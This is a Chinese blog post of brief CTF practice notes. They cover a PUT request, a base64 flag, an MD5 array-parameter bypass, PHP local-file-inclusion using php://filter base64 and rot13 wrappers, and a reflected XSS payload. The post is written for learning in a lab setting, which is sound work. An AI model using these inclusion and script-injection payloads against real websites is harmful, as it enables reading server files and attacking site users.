CTF-1-5题笔记
CTF-1-5题笔记
POST
put me a message php
ZmxhZ3twdXRfcmVxdWVzdHVoMjEyMzJ9 base64解码spa
F12
查看页面源代码和请求包头拼凑成flag3d
Code~md5
获得php代码 输入参数v1[]=1&&v2[]=2&&v3[] code
获得flagblog
Include
重点难点对我而言ip
查看include1.phpmd5
构造伪协议get
php://filter/read=convert.base64-encode/resource=include1(//注意不用加后缀.php)string
解码知道include1过滤了flag,但有提示include2base64
再从新看include2解码发现没有过滤flag
构造伪协议 但要用rot13而且是include2下而非include1
php://filter/read=string.rot13/resource=flag
获得flag
XSS
这个好像没有设置过滤,直接输入"><script>alert('XSS');</script>就绕过了
得到Key
Md5解码
"><script>alert('XSS');</script>
进行md5解密
心得:经过作题更加深入理解这些方法。今天搞了很久第六题没搞懂啊,各类大小写,双写,畸形,.htaccess仍是不行啊,提示没搞懂,靠。黑名单我特么都搞不来,菜!!!
相关文章
- 1. 刷题笔记
- 2. 笔记题
- 3. map parseInt(笔试题笔记)
- 4. 【2018】笔试题笔记
- 5. 错题笔记(十题)
- 6. leetcode刷题笔记
- 7. 刷题笔记 - 0422
- 8. 面试题笔记
- 9. DSP问题笔记
- 10. JAVA刷题笔记
- 更多相关文章...
- • Markdown 标题 - Markdown 教程
- • jQuery Mobile 主题 - jQuery Mobile 教程
- • Tomcat学习笔记(史上最全tomcat学习笔记)
- • PHP Ajax 跨域问题最佳解决方案
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 刷题笔记
- 2. 笔记题
- 3. map parseInt(笔试题笔记)
- 4. 【2018】笔试题笔记
- 5. 错题笔记(十题)
- 6. leetcode刷题笔记
- 7. 刷题笔记 - 0422
- 8. 面试题笔记
- 9. DSP问题笔记
- 10. JAVA刷题笔记